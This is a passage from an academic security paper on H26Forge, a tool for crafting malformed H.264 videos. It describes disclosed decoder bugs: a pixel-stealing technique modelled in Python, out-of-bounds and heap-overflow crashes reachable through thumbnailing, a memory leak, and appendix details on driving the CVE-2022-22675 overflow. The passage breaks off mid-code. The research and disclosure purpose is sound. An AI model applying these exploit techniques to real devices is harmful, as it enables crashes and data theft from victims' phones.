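To illustrate the Figure 5 construction, here is a minimal Python model of 16 × 16 vertical and horizontal Intra prediction with the residue removed and deblocking disabled, as LCT requires. The function names and the line_above / column_left buffers are hypothetical stand-ins for whatever state a hardware decoder keeps. The H.264 spec only allows vertical (horizontal) prediction when the top (left) neighbors are available, which the check_availability path enforces; a decoder that skips that check copies leftover buffer contents into the top row or left column, and reusing the same mode across the slice replicates those values over the whole frame.

```python
MB = 16  # macroblock width/height in luma samples


def predict_vertical(frame, line_above, mb_x, mb_y, check_availability=True):
    """Intra 16x16 vertical prediction with zero residue: copy the row above down the block."""
    x0, y0 = mb_x * MB, mb_y * MB
    if mb_y > 0:
        top = frame[y0 - 1][x0:x0 + MB]
    elif check_availability:
        raise ValueError("top neighbor unavailable: vertical mode not allowed here")
    else:
        top = line_above[x0:x0 + MB]  # whatever the decoder's buffer still holds
    for y in range(y0, y0 + MB):
        frame[y][x0:x0 + MB] = top


def predict_horizontal(frame, column_left, mb_x, mb_y, check_availability=True):
    """Intra 16x16 horizontal prediction with zero residue: copy the left column across."""
    x0, y0 = mb_x * MB, mb_y * MB
    if mb_x > 0:
        left = [frame[y][x0 - 1] for y in range(y0, y0 + MB)]
    elif check_availability:
        raise ValueError("left neighbor unavailable: horizontal mode not allowed here")
    else:
        left = column_left[y0:y0 + MB]
    for dy in range(MB):
        frame[y0 + dy][x0:x0 + MB] = [left[dy]] * MB


def decode_lct(width_mbs, height_mbs, stale, predict):
    """Apply one prediction mode to every macroblock in raster order, amplifying `stale`."""
    frame = [[0] * (width_mbs * MB) for _ in range(height_mbs * MB)]
    for mb_y in range(height_mbs):
        for mb_x in range(width_mbs):
            predict(frame, stale, mb_x, mb_y, check_availability=False)
    return frame
```

In the vertical case every output row ends up equal to the stale line, and in the horizontal case every output column equals the stale column, which is the amplification effect the LCT videos rely on.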
Device | Type | SoC | VPU | HDT | OMX Name | Android Version | Kernel
Odroid C2 | SBC | Amlogic S905 | Amlogic Video Engine | 1 | OMX.amlogic.avc.decoder.awesome | 6.0.1 | 3.14.29
Pine A64 | SBC | Allwinner A64 | CedarV | 4 | OMX.allwinner.video.decoder.avc | 7.1.2 | 3.10.105
Huawei Honor 9x | Phone | HiSilicon Kirin 710 | HiSilicon VDEC V200 | 16 | OMX.hisi.video.decoder.avc | 9 (EMUI 9.1.0) | 4.9.148
HP Chromebook 11a | Netbook | MediaTek MT8183 | MediaTek VPU | 8 | c2.vda.avc.decoder | 9 | 5.10.114
Lenovo TB-7305F | Tablet | MediaTek MT8321 | MediaTek VPU | 4 | OMX.MTK.VIDEO.DECODER.AVC | 9 | 4.9.117
Xiaomi Redmi Note 8 Pro | Phone | MediaTek Helio G90T | MediaTek VPU | 16 | OMX.MTK.VIDEO.DECODER.AVC | 9 (MIUI 11.0.4.0) | 4.14.94
Xiaomi Redmi 9C | Phone | MediaTek Helio G35 | MediaTek VPU | 16 | OMX.MTK.VIDEO.DECODER.AVC | 10 (MIUI 12.0.7) | 4.9.190
Huawei MediaPad M5 Lite | Tablet | HiSilicon Kirin 659 | PowerVR D5500 | 8 | OMX.IMG.MSVDX.Decoder.AVC | 8 (EMUI 8) | 4.4.23
Huawei Honor 8 (FRD-AL10) | Phone | HiSilicon Kirin 950 | PowerVR D5500 | 8 | OMX.IMG.MSVDX.Decoder.AVC | 7 (EMUI 5.0.1) | 4.1.18
Dragonboard 410C | SBC | Qualcomm Snapdragon 410 | Qualcomm Venus | 8 | OMX.qcom.video.decoder.avc | 5.1.1 | 3.10.49
Galaxy Tab E | Tablet | Qualcomm Snapdragon 410 | Qualcomm Venus | 8 | OMX.qcom.video.decoder.avc | 7.1.1 | 3.10.49
Nano Pi M4 | SBC | Rockchip RK3399 | RKVdec/Hantro | 6 | OMX.rk.video_decoder.avc | 8.1 | 4.4.167
Odroid XU4 | SBC | Samsung Exynos 5422 | Samsung MFC | 8 | OMX.Exynos.AVC.Decoder | 4.4.4 | 3.10.9
VANKYO MatrixPad S21 | Tablet | UNISOC SC9863A | UNISOC VSP | 10 | OMX.sprd.h264.decoder | 9 | 4.4.147
VANKYO MatrixPad S10 | Tablet | UNISOC SC7731E | UNISOC VSP | 10 | OMX.sprd.h264.decoder | 9 | 4.4.147
cently decoded, or (3) there is no other decode going on at the same time, we can recover uninitialized data from the decoder.
To generate LCT, we start with a video that contains an SPS, a PPS, and an I slice; we then remove all of the residue, disable the deblocking filter, and set every macroblock to a target macroblock type. Listing 1 shows a video transform to generate LCT. Based on the specification, Intra prediction can be performed at three granularities: 16 × 16, 8 × 8, and 4 × 4. Note that the 8 × 8 granularity forces the block through the deblocking filter [30], so 8 × 8 predicted blocks will not provide the exact recovered values. When testing LCT on devices, we find that all granularities produce consistent results. Even though only the top-most or left-most blocks read from buffers with unexpected values, we copy the same Intra prediction mode across the rest of the slice to amplify the data.
We test the vertical and horizontal LCT videos against a target video, running them both in parallel and sequentially. Parallel decoding means we start the target video, start LCT, and then stop the target video; in this scenario, each video consumes a single thread of the hardware video decoder. When testing sequentially, we play LCT after the target video has stopped, thus testing whether any leftover data remains in the hardware video decoder. Figure 6 shows what LCT looks like on the VANKYO S21, which allows for parallel stealing. Table 3 shows the results for all of our target devices.

Table 3: Luma Chroma Thief results for test devices. We run both horizontal (HLCT) and vertical (VLCT) LCT in parallel with another video and sequentially right after another video has been decoded. Devices are grouped by VPU.

Device | HLCT-P | HLCT-S | VLCT-P | VLCT-S
Odroid C2 | N/A | Thief | N/A | Thief
Pine A64 | Uninit | Uninit | Uninit | Uninit
Huawei Honor 9X | 0x80/Thief | 0x80/Uninit | 0x80/Thief | 0x80/Uninit
HP Chromebook 11a | Y:0x10; UV:0x80 | Y:0x10; UV:0x80 | Uninit | Uninit
Lenovo TB-7305F | Y:0x10; UV:0x80 | Y:0x10; UV:0x80 | Y:0x10; UV:0x80 | Y:0x10; UV:0x80
Xiaomi Redmi Note 8 Pro | 0x00 | 0x00 | Uninit | Uninit
Xiaomi Redmi 9C | 0x00 | 0x00 | Uninit | Uninit
Huawei MediaPad M5 Lite | 0x80 | 0x80 | 0x00 | 0x00
Huawei Honor 8 (FRD-AL10) | 0x80 | 0x80 | 0x00 | 0x00
Dragonboard 410C | 0x00 | 0x00 | Thief | Thief
Galaxy Tab E | 0x00 | 0x00 | Thief | Thief
Nano Pi M4 | 0x80 | 0x80 | 0x80 | 0x80
Odroid XU4 | 0x00 | 0x00 | 0x80 | 0x80
VANKYO MatrixPad S21 | Thief | Uninit | Thief | Uninit
VANKYO MatrixPad S10 | No Output | No Output | Thief | Uninit

-P / -S: LCT run in parallel with / sequentially after the target video.
Thief: LCT was successful in stealing pixels.
Uninit: LCT was able to read uninitialized data.
No Output: The surface value was black, and output to a file was empty.
Hex numbers: the value of the indicated component(s) (e.g., Y:0x10; UV:0x80) or the value of each YUV component (e.g., 0x80).
N/A: The Odroid C2 has a single-threaded decoder, so parallel decoding is not possible.
0x80/Thief/Uninit: the Honor 9X produced a frame that was mostly error concealed, except for a single macroblock.

Because the values that we modify are in the CAVLC/CABAC-encoded macroblock layer, the issues lie at the hardware video decoder level, either in the firmware or in the hardware. Furthermore, no layer that inspects the video (browser, decoder, kernel driver) can determine whether a video contains LCT logic without decoding it completely.

6.3.3 Hardware memory traversal

During our analysis, we found log messages from the D5500 in Kirin SoCs and from the MediaTek VPU that suggest the ability to traverse hardware memory using two different syntax elements. First, the first_mb_in_slice slice header syntax element is used as part of the ASO feature to denote where in the frame to start writing. Second, the mb_skip_run slice data syntax element allows CAVLC-encoded videos to skip macroblocks in the frame that are the same as those in reference frames. The log messages indicated that either a first_mb_in_slice or an mb_skip_run larger than the frame size may lead to an out-of-bounds access. We found evidence of this in the D5500 in Kirin SoCs, but were not able to produce further results. For the MediaTek VPU, we were able to show a denial-of-service vulnerability on the Redmi Note 8 Pro. Both issues are reachable through video thumbnailing, so an attacker only has to send a video to a place where the victim's device will generate a thumbnail for it.
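The condition reported in those log messages amounts to a missing bounds check on two syntax elements. The following is a minimal Python sketch of the check a parser could apply before handing a slice to hardware. It assumes a progressive stream (frame_mbs_only_flag = 1, no MBAFF), for which the specification's PicSizeInMbs is (pic_width_in_mbs_minus1 + 1) × (pic_height_in_map_units_minus1 + 1); the `Sps` class and the `slice_stays_in_frame` function are hypothetical names for illustration, not part of H26Forge or any vendor driver.

```python
from dataclasses import dataclass
from typing import Sequence


@dataclass
class Sps:
    """Hypothetical subset of SPS fields needed to size a progressive frame."""
    pic_width_in_mbs_minus1: int
    pic_height_in_map_units_minus1: int


def pic_size_in_mbs(sps: Sps) -> int:
    """PicSizeInMbs for a frame-only stream: width in MBs times height in MBs."""
    return (sps.pic_width_in_mbs_minus1 + 1) * (sps.pic_height_in_map_units_minus1 + 1)


def slice_stays_in_frame(sps: Sps, first_mb_in_slice: int, mb_skip_runs: Sequence[int]) -> bool:
    """Return False if the slice start or any skip run would pass the last macroblock."""
    size = pic_size_in_mbs(sps)
    # first_mb_in_slice must address a macroblock inside the frame.
    if not 0 <= first_mb_in_slice < size:
        return False
    curr_mb_addr = first_mb_in_slice
    for run in mb_skip_runs:
        # H.264 limits mb_skip_run to the range [0, PicSizeInMbs - CurrMbAddr].
        if run < 0 or run > size - curr_mb_addr:
            return False
        # Simplification: assume one coded macroblock follows each skip run.
        curr_mb_addr += run + 1
    return True
```

For a 1280 × 720 stream, pic_width_in_mbs_minus1 = 79 and pic_height_in_map_units_minus1 = 44, so the frame holds 80 × 45 = 3600 macroblocks; a first_mb_in_slice of 3600, or an mb_skip_run that overshoots the remaining macroblocks, is rejected rather than forwarded to the decoder.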
Kirin SoC D5500. In Kirin SoC devices with the D5500 decoder, we found that we can traverse the decoder's stream buffer heap virtual memory by controlling the frame size in the SPS along with first_mb_in_slice. By adjusting these syntax elements with a video transform, we could trigger MMU page faults that the kernel would log in the stream buffer heap address range. Per the source code,21 the stream buffer heap contains structures used to decode the video, such as firmware contexts, SPSes, and PPSes; it is managed by the device and may therefore contain device-corruptible data.
We were limited in our ability to determine what the exact read or write operations were doing because the D5500 firmware runs on a custom Imagination Technologies DSP architecture called MTX [21], for which we were not able to find adequate tooling.

Redmi Note 8 Pro MediaTek VPU. A video with an mb_skip_run larger than the frame size leads to a denial-of-service vulnerability on the MediaTek VPU located in the Redmi Note 8 Pro. The MediaTek Security Team reported that they were able to reproduce this issue in Android 9 and 10, but were unable to do so in Android 11 or later.
The MediaTek Helio G90T SoC implements a security feature called the Device Access Permission Control (devapc) driver. Devapc enforces device-defined access controls using TrustZone and triggers a violation interrupt on unauthorized accesses. Attempting to decode a video with an out-of-bounds mb_skip_run triggers a devapc violation and causes the device to reboot. The reboot happens because the application processor attempts to access video decoder memory at an out-of-bounds address, and devapc calls BUG() after logging the violation.22 The crash does not happen every time, so we suspect a race condition in the MediaTek video decoder driver. Although other MediaTek VPUs logged violations, they did not cause reboots.

21 Online: https://github.com/Honor8Dev/android_kernel_huawei_FRD-L04/blob/master/drivers/vcodec/imagination/D5500_DRM/decoder/vdec/kernel_device/libraries/vdecdd/code/vdecdd_mmu.c.
22 Online: https://github.com/MiCode/Xiaomi_Kernel_OpenSource/blob/begonia-r-oss/drivers/misc/mediatek/devapc/devapc-mtk-common.c#L333.

[Figure 6 panels: (a) Target; (b) PV 4 × 4; (c) PV 8 × 8; (d) PV 16 × 16; (e) SV 4 × 4; (f) SV 8 × 8; (g) SV 16 × 16; (h) PH 4 × 4; (i) PH 8 × 8; (j) PH 16 × 16; (k) SH 4 × 4; (l) SH 8 × 8; (m) SH 16 × 16]
Figure 6: LCT results on the VANKYO S21 with a UNISOC VSP. The target video is the opening frame of Big Buck Bunny [42]. 8 × 8 Intra prediction goes through an extra deblocking process, regardless of settings. Parallel vertical (PV) LCT takes the bottom-most pixels of the target video, and parallel horizontal (PH) LCT takes the right-most pixels from the bottom-right-most macroblock. We were not able to derive a pattern from the recovered uninitialized data in sequential vertical (SV) and sequential horizontal (SH) LCT.

We found a heap overflow in Kirin SoCs running the D5500 video decoder, which includes the Honor 8 and the MediaPad M5 Lite. The triggering video uses the FMO feature of H.264; Kirin SoCs were among the few to support this feature. This vulnerability is reachable through thumbnailing, so an attacker only has to send a video to a victim. It does not lend itself to more than a denial of service, because kernel guard pages prevent neighboring heap allocations from being corrupted.
FMO allows a frame to be split into up to eight slice groups, so that if any part is lost in transit the image can still be partially reconstructed. FMO is signaled in the PPS by denoting the number of slice groups to use as well as their organization within a frame. Because each macroblock in the frame can be in one of eight slice groups, the decoder maintains a map from macroblock address to slice group called the Slice Group Map (SGM). The D5500 decoder allocates a hardware SGM of 3600 bytes and enforces this limit by only allowing videos with a width of 1280 pixels to use FMO. But because the height is not checked, it is possible to create an SGM larger than 3600 bytes, causing a heap overflow. The user-side library allocates an SGM that is as large as the frame and passes it to the driver. When the driver attempts to copy the user SGM buffer to the hardware, it writes past the allocated space and triggers a kernel panic due to a guard page access. Though there is an assert in the code to
prevent an overflow, it is not blocking and merely prints an assert failure.
We use H26Forge to generate videos that use FMO with a fixed width of 1280 and increasing height to determine the bounds of our overflow. Though H26Forge cannot decode FMO videos, it can generate videos that use it.

6.3.5 CedarV uninitialized memory leak

On the Pine A64 with the CedarV video decoder, we discovered a new way to exploit the Android ION vulnerability found in [47], which allows for kernel information leakage. We leak uninitialized memory by creating a video with H26Forge whose first slice NALU is an IDR B slice. The IDR NALU leads CedarV to create an ION allocation for a frame, but the B slice type causes an error (an IDR picture may only contain I or SI slices), so CedarV returns the uninitialized ION memory. The issue only arises when CedarV manages the frame allocation; when the output is to a Surface, the Android OS handles frame management, preventing an information leak.
We defer to Section 6.4 of [47] for a description of how this vulnerability can be exploited.

7 Related Work

We are not familiar with any existing tool that can programmatically modify the syntax elements of an H.264-encoded video. The current Swiss Army knife of the video world, FFmpeg,23 can decode and encode common H.264 videos, but errors out on spec-non-compliant videos and does not support many H.264 features. The H.264 reference decoder,24 which is the ground truth for the H.264 spec, does not keep the syntax elements in memory, as it focuses on producing an output image. Even tools for debugging video files, such as Elecard's StreamEye,25 are used to visually inspect videos in order to tune a video encoder rather than to edit syntax elements.
Several exploitable vulnerabilities in video decoders have previously been demonstrated. Gong and Pi [16] describe an exploitable vulnerability in the Venus firmware found in Qualcomm Snapdragon SoCs. Donenfeld [13] found a kernel overwrite vulnerability in AppleD5500.kext for iOS 10. Tarakanov and Labunets [45] found an out-of-bounds write vulnerability in AppleAVD.kext and discuss its internals. They also discuss CVE-2022-22675, but do not provide details on how to extend the initial overflow.
Format-aware fuzzers such as QuickFuzz [17] and its derivatives [37, 44] can generate test inputs based on a grammar, but they cannot produce the entropy-encoded values needed for H.264. For example, FormatFuzzer [15] opts to replace compressed data in certain file formats with random bytes that can “be successfully decompressed with high probability.” FuzzGen [22] generates fuzzers for libraries by reviewing their real-world usage and produces LLVM libFuzzer stubs. The FuzzGen authors evaluated FuzzGen on Android codec libraries and found 17 vulnerabilities in H.265 and H.264 codec handling. Synopsys Defensics is an industry fuzzer that provides an H.264 test suite,26 but Synopsys describes slice data testing via mutation fuzzing; it is unclear whether it can generate syntax-compliant encoded H.264 videos. None of these fuzzers focuses on video generation at the syntax level, and they also ignore CAVLC- and CABAC-encoded elements.
The security of hardware accelerators is the focus of much recent work. Olson, Sethumadhavan, and Hill [36] systematize the threats posed to users by insecure third-party accelerators. Illustrating these risks, much academic and industry research has examined third-party accelerators, such as neural processing units [7, 32, 39], digital signal processors [28, 29], graphics processing units [19], wireless coprocessors [8, 9, 12, 20], security coprocessors [31, 46], and, as described above, hardware video decoders [13, 16, 45].

8 Conclusion

We have described H26Forge, domain-specific infrastructure for analyzing, generating, and manipulating syntactically correct but semantically spec-non-compliant video files. Using H26Forge, we have discovered (and responsibly disclosed) multiple memory corruption vulnerabilities in video decoding stacks from multiple vendors.
We draw two conclusions from our experience with H26Forge.
First, domain-specific tools are useful and necessary for improving video decoder security. Generic fuzzing tools have been used with great success to improve the quality of other kinds of media-parsing libraries, but that success has evidently not translated to video decoding.
The bugs we found and described in Section 5 have been present in iOS for a long time. We have tested that our proof-of-concept videos induce kernel panics on devices running iOS 13.3 (released December 2019) and iOS 15.6 (released July 2022). Binary analysis suggests that the first bug we identified was present in the kernel as far back as iOS 10, the first release whose kernel binary was distributed unencrypted.
We make H26Forge available at https://github.com/h26forge/h26forge under an open source license. We hope that it will facilitate follow-up work, both by academic researchers and by the vendors themselves, to improve the software quality of video decoders.
Second, the video decoder ecosystem is more insecure than
previously realized. Platform vendors should urgently consider designs that deprivilege software and hardware components that process untrusted video input.
Browser vendors have worked to sandbox media decoding libraries (see, e.g., Narayan et al. [34]); so have messaging app vendors, with the iMessage BlastDoor process being a notable example [18]. Mobile OS vendors have also worked to sandbox system media servers.27 These efforts are undermined by parsing video formats in kernel drivers.
Our reading of reverse-engineered kernel drivers suggests that current hardware relies on software to parse parameter sets and populate a context structure used by the hardware in macroblock decoding. It is not clear that it is safe to invoke hardware decoding with a maliciously constructed context structure, which suggests that whatever software component is charged with parsing parameter sets and populating the hardware context will need to be trusted, whether it is in the kernel or not. It may be worthwhile to rewrite this software component in a memory-safe language, as in the cros-codecs effort,28 or to apply formal verification techniques to it.
An orthogonal direction for progress, albeit one that will require the support of media IP vendors, would redesign the software–hardware interface to simplify it. The Linux push for stateless hardware video decoders [14] is a step in this direction. Similarly, encoders that produce outputs that are software-decoder friendly, such as some AV1 encoders [27], help reduce the expected complexity of video decoders.

23 Online: https://www.ffmpeg.org/.
24 Online: https://vcgit.hhi.fraunhofer.de/jvet/JM.
25 Online: https://www.elecard.com/products/video-analysis/streameye.
26 Online: https://www.synopsys.com/software-integrity/security-testing/fuzz-testing/defensics/protocols/h264-file.html.
27 See, e.g., https://source.android.com/docs/core/media/framework-hardening.
28 Online: https://chromium.googlesource.com/crosvm/crosvm/+/refs/heads/main/media/cros-codecs/.

Acknowledgements

We would first like to acknowledge Øystein Sigholt and Jiaming Hu, whose 2018 CSE 227 browser fingerprinting project was the first to encounter the Luma Chroma Thief effect and inspired the tooling effort described in this paper. We would also like to thank Alex Gantman, David Kohlbrenner, and Stefan Savage for conversations about this work, and Hang Zhang and Zhiyun Qian for discussing their ION allocator work with us. This work was partly supported by a grant from Cisco and a research gift from Qualcomm.

References

[1] Paul Adenot and Bernard Aboba. WebCodecs. Working Draft. Online: https://www.w3.org/TR/webcodecs/. W3C, Feb. 2023.
[2] “About the security content of iOS 16.1 and iPadOS 16.” Online: https://support.apple.com/en-us/HT213489. Oct. 2022.
[3] “About the security content of iOS 15.7.1 and iPadOS 15.7.1.” Online: https://support.apple.com/en-us/HT213490. Oct. 2022.
[4] “About the security content of iOS 15.7.2 and iPadOS 15.7.2.” Online: https://support.apple.com/en-us/HT213531. Dec. 2022.
[5] “About the security content of iOS 16.2 and iPadOS 16.2.” Online: https://support.apple.com/en-us/HT213530. Dec. 2022.
[6] Apple Platform Security. Online: https://help.apple.com/pdf/security/en_US/apple-platform-security-guide.pdf. Dec. 2022.
[7] Brandon Azad. “An iOS hacker tries Android.” Online: https://googleprojectzero.blogspot.com/2020/12/an-ios-hacker-tries-android.html. Dec. 2020.
[8] Ian Beer. “An iOS zero-click radio proximity exploit odyssey.” Online: https://googleprojectzero.blogspot.com/2020/12/an-ios-zero-click-radio-proximity.html. Dec. 2020.
[9] Gal Beniamini. “Over The Air: Exploiting Broadcom’s Wi-Fi Stack (Part 1).” Online: https://googleprojectzero.blogspot.com/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html. Apr. 2017.
[10] Mark Brand. “Stagefrightened?” Online: https://googleprojectzero.blogspot.com/2015/09/stagefrightened.html. Sept. 2015.
[11] “CERT Vulnerability Note VU#924951.” Online: https://www.kb.cert.org/vuls/id/924951. July 2015.
[12] Jiska Classen, Francesco Gringoli, Michael Hermann, and Matthias Hollick. “Attacks on Wireless Coexistence: Exploiting Cross-Technology Performance Features for Inter-Chip Privilege Escalation.” In: Proceedings of IEEE Security and Privacy (“Oakland”) 2022 (May 2022), pp. 1229–45.
[13] Adam Donenfeld. “Viewer Discretion Advised: (De)coding an iOS Kernel Vulnerability.” In: Phrack 70 (Oct. 2021). Online: http://phrack.org/issues/70/8.html.
[14] Nicolas Dufresne. “Linux Stateless Video Decoder Support.” Presented at ELC 2020. Slides online: https://elinux.org/images/c/c7/2020-06_ELCNA_-_Nicolas_Dufresne.pdf. July 2020.
[15] Rafael Dutra, Rahul Gopinath, and Andreas Zeller. “FormatFuzzer: Effective Fuzzing of Binary File Formats.” arXiv preprint arXiv:2109.11277. Online: https://arxiv.org/abs/2109.11277. Sept. 2021.
[16] Xiling Gong and Peter Pi. “Bypassing the Maginot Line: Remotely Exploit the Hardware Decoder on Smartphone.” Presented at Black Hat 2019. Slides online: https://i.blackhat.com/USA-19/Wednesday/us-19-Gong-Bypassing-The-Maginot-Line-Remotely-Exploit-The-Hardware-Decoder-On-Smartphone.pdf. Aug. 2019.
[17] Gustavo Grieco, Martín Ceresa, Agustín Mista, and Pablo Buiras. “QuickFuzz testing for fun and profit.” In: Journal of Systems and Software 134 (Dec. 2017), pp. 340–54.
[18] Samuel Groß. “A Look at iMessage in iOS 14.” Online: https://googleprojectzero.blogspot.com/2021/01/a-look-at-imessage-in-ios-14.html. Jan. 2021.
[19] Ben Hawkes. “Attacking the Qualcomm Adreno GPU.” Online: https://googleprojectzero.blogspot.com/2020/09/attacking-qualcomm-adreno-gpu.html. Sept. 2020.
[20] Grant Hernandez, Marius Muench, Dominik Maier, Alyssa Milburn, Shinjo Park, Tobias Scharnowski, Tyler Tucker, Patrick Traynor, and Kevin R. B. Butler. “FirmWire: Transparent Dynamic Analysis for Cellular Baseband Firmware.” In: Proceedings of NDSS 2022. Feb. 2022.
[21] Imagination Technologies. “Metagence Multi-threaded Processor IP Cores.” Archived: https://web.archive.org/web/20060813152939/http://www.imgtec.com/metagence/products/. 2006.
[22] Kyriakos Ispoglou, Daniel Austin, Vishwath Mohan, and Mathias Payer. “FuzzGen: Automatic Fuzzer Generation.” In: Proceedings of USENIX Security 2020. Aug. 2020, pp. 2271–87.
[23] H.264: Advanced video coding for generic audiovisual services. Standard. Online: https://www.itu.int/rec/T-REC-H.264-202108-I/en. ITU-T, Aug. 2021.
[24] Conformance specification for ITU-T H.264 advanced video coding. Standard. Online: https://www.itu.int/rec/T-REC-H.264.1-201602-I/en. ITU-T, Aug. 2021.
[25] Pierre Laperdrix, Nataliia Bielova, Benoit Baudry, and Gildas Avoine. “Browser Fingerprinting: A Survey.” In: ACM Transactions on the Web 14.2 (Apr. 2020).
[26] Kevin Lee, Vijay Rao, and William Arnold. “Accelerating Facebook’s infrastructure with application-specific hardware.” Online: https://engineering.fb.com/2019/03/14/data-center-engineering/accelerating-infrastructure/. Mar. 2019.
[27] Ryan Lei, Haixia Shi, Haoteng Chen, Ali Monfared, and Cheng Shi. “How Meta brought AV1 to Reels.” Online: https://engineering.fb.com/2023/02/21/video-engineering/av1-codec-facebook-instagram-reels/. Feb. 2023.
[28] Slava Makkaveev. “Looking for vulnerabilities in MediaTek audio DSP.” Online: https://research.checkpoint.com/2021/looking-for-vulnerabilities-in-mediatek-audio-dsp/. Nov. 2021.
[29] Slava Makkaveev. “Pwn2Own Qualcomm DSP.” Online: https://research.checkpoint.com/2021/pwn2own-qualcomm-dsp/. May 2021.
[30] Detlev Marpe, Thomas Wiegand, and Stephen Gordon. “H.264/MPEG4-AVC Fidelity Range Extensions: Tools, Profiles, Performance, and Application Areas.” In: Proceedings of ICIP 2005, Volume I. Sept. 2005, pp. 593–96.
[31] Damiano Melotti, Maxime Rossi-Bellom, and Andrea Continella. “Reversing and Fuzzing the Google Titan M Chip.” In: Proceedings of ROOTS 2021. Nov. 2021, pp. 1–10.
[32] Man Yue Mo. “Fall of the Machines: Exploiting the Qualcomm NPU (Neural Processing Unit) Kernel Driver.” Online: https://securitylab.github.com/research/qualcomm_npu/. Nov. 2021.
[33] “Mozilla Foundation Security Advisory 2022-40.” Online: https://www.mozilla.org/en-US/security/advisories/mfsa2022-40/. Sept. 2022.
[34] Shravan Narayan, Craig Disselkoen, Tal Garfinkel, Nathan Froyd, Eric Rahm, Sorin Lerner, Hovav Shacham, and Deian Stefan. “Retrofitting Fine Grain Isolation in the Firefox Renderer.” In: Proceedings of USENIX Security 2020. Aug. 2020, pp. 699–716.
[35] Hikaru Nishida, Suleiman Souhlal, and Sangwhan Moon. “Making Android Runtime on Chrome OS More Secure and Easier to Upgrade with ARCVM.” Online: https://chromeos.dev/en/posts/making-android-more-secure-with-arcvm. Mar. 2022.
[36] Lena E. Olson, Simha Sethumadhavan, and Mark D. Hill. “Security Implications of Third-Party Accelerators.” In: IEEE Computer Architecture Letters 15.1 (Jan. 2016), pp. 50–53.
[37] Rohan Padhye, Caroline Lemieux, Koushik Sen, Mike Papadakis, and Yves Le Traon. “Semantic Fuzzing with Zest.” In: Proceedings of ISSTA 2019. July 2019, pp. 329–40.
[38] Gwendal Patat, Mohamed Sabt, and Pierre-Alain Fouque. “Exploring Widevine for Fun and Profit.” In: Proceedings of WOOT 2022. May 2022, pp. 277–88.
[39] Maxime Peterlin. “Reversing and Exploiting Samsung’s Neural Processing Unit.” Online: https://blog.impalabs.com/2103_reversing-samsung-npu.html. Mar. 2021.
[40] Parthasarathy Ranganathan, Daniel Stodolsky, Jeff Calow, Jeremy Dorfman, Marisabel Guevara, Clinton Wills Smullen IV, et al. “Warehouse-Scale Video Acceleration: Co-Design and Deployment in the Wild.” In: Proceedings of ASPLOS 2021. Apr. 2021, pp. 600–15.
[41] Iain E. Richardson. The H.264 Advanced Video Compression Standard. Second edition. Wiley, 2010.
[42] Ton Roosendaal. “Big Buck Bunny.” In: ACM SIGGRAPH ASIA 2008 Computer Animation Festival. Dec. 2008, p. 62.
[43] Natalie Silvanovich. “CVE-2022-22675: AppleAVD Overflow in AVC_RBSP::parseHRD.” Online: https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2022/CVE-2022-22675.html. May 2022.
[44] Prashast Srivastava and Mathias Payer. “Gramatron: Effective Grammar-Aware Fuzzing.” In: Proceedings of ISSTA 2021. July 2021, pp. 244–56.
[45] Nikita Tarakanov and Andrey Labunets. “Cinema time!” Presented at Hexacon 2022. Slides online: https://github.com/isciurus/hexacon2022_AppleAVD/blob/main/hexacon2022_AppleAVD.pdf. Oct. 2022.
[46] David Wang, Mathew Solnik, and Tarjei Mandt. “Demystifying the Secure Enclave Processor.” Presented at Black Hat 2016. Slides online: https://www.blackhat.com/docs/us-16/materials/us-16-Mandt-Demystifying-The-Secure-Enclave-Processor.pdf. Aug. 2016.
[47] Hang Zhang, Dongdong She, and Zhiyun Qian. “Android ION Hazard: The Curse of Customizable Memory Management System.” In: Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security. 2016, pp. 1663–1674.

A More details on CVE-2022-22675

This section provides more details on how we controlled the second overflow in our proof-of-concept video for CVE-2022-22675. Listing 2 shows the final transform.
We enable a second overflow in parsePredWeightTable by overwriting num_ref_idx_l0_active_minus1 with CVE-2022-22675. The function parsePredWeightTable loops from 0 to num_ref_idx_l0_active_minus1, checking a luma or chroma flag on each iteration to determine whether to parse the syntax elements luma_weight, luma_offset, chroma_weight, and chroma_offset when the respective flag is set. The H.264 User Context maintains eight lists of type uint16: for both reference lists, it has arrays of length 16 for luma_weight and luma_offset, and arrays of length 32 for chroma_weight and chroma_offset. For each syntax element, AppleAVD.kext exp-Golomb decodes it, stores the recovered value in the H.264 User Context, and then checks whether it is in the range [0, 255].
We found that in parsePredWeightTable, the overwritten 8-bit num_ref_idx_l0_active_minus1 is sign-extended to 32 bits. This means that setting it to a value larger than 127 leads to a uint32 loop bound of at least 4,294,967,040! If the encoded bitstream is exhausted without failure, the bitstream reader returns a bit string of all 1s, which exp-Golomb decodes to 0. This is within the bounds for each syntax element, so the loop continues writing until it runs past the end of the kernel heap, triggering a kernel panic. Alternatively, if the decoder encounters a luma/chroma weight or offset outside the expected bounds, it first stores the out-of-bounds weight or offset as normal, then exits the loop, emits an error message, and continues to the next NALU.
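Two properties drive this loop: the sign extension of the overwritten 8-bit count and the exhausted bitstream decoding to zeros. Both can be reproduced in a few lines. The Python sketch below is an illustrative model, not AppleAVD.kext code: `BitReader`, `read_ue`, `read_se`, and `sign_extend_u8_to_u32` are hypothetical names, and the "return 1 once exhausted" behavior is an assumption modeled on the description above. The ue(v) and se(v) mappings follow the exp-Golomb definitions in the H.264 specification [23].

```python
class BitReader:
    """MSB-first bit reader over a byte string (illustrative model only).

    Assumption: once the data is exhausted, read_bit() keeps returning 1,
    mirroring the exhausted-bitstream behavior described in the text.
    """

    def __init__(self, data: bytes) -> None:
        self.data = data
        self.pos = 0  # current bit position

    def read_bit(self) -> int:
        if self.pos >= len(self.data) * 8:
            return 1  # exhausted: behave as if the stream were all 1 bits
        bit = (self.data[self.pos // 8] >> (7 - self.pos % 8)) & 1
        self.pos += 1
        return bit

    def read_bits(self, n: int) -> int:
        value = 0
        for _ in range(n):
            value = (value << 1) | self.read_bit()
        return value

    def read_ue(self) -> int:
        """ue(v): N leading zeros, a 1, then N info bits; value = 2**N - 1 + info."""
        leading_zeros = 0
        while self.read_bit() == 0:
            leading_zeros += 1
        return (1 << leading_zeros) - 1 + self.read_bits(leading_zeros)

    def read_se(self) -> int:
        """se(v): maps ue(v) codes 0, 1, 2, 3, 4, ... to 0, 1, -1, 2, -2, ..."""
        k = self.read_ue()
        return (k + 1) // 2 if k % 2 else -(k // 2)


def sign_extend_u8_to_u32(value: int) -> int:
    """Treat an 8-bit field as signed, then reinterpret it as a uint32."""
    value &= 0xFF
    if value & 0x80:
        value -= 0x100  # negative as a signed 8-bit integer
    return value & 0xFFFFFFFF


if __name__ == "__main__":
    exhausted = BitReader(b"")
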